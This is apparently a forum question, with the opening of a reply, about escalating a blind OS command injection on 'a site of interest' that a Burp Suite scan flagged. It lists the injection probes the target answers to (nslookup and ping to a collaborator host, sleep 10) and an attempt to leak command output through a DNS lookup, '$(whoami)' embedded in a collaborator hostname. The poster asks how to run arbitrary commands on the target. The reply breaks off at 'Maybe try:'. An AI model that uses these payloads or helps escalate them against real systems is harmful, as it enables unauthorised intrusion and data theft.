A few days ago I found a vulnerability in a site of interest through burp suite scanner using nslookup xxx.burpcolaborator.com exploit with the following feature
Issue: OS command injection Severity: High Confidence: Certain
the vulnerability only responds when using ` and only responds to the nslookup, sleep and ping including the burp colaborator.
These are the only commands it respond to.
nslookup xxx.burpcolaborator.com
ping xxx.burpcolaborator.com
sleep 10
other commands like nslookup $(whoami).xxx.burp collaborator.com They do not give any answer, please I would appreciate it if you could help me with this problem since I cannot find a way to exploit this vulnerability and I want it to execute other commands apart from nslookup or sleep.
I await your response. Thanx
Seems like it it could be Windows which is why
$()wouldn't work. Maybe try: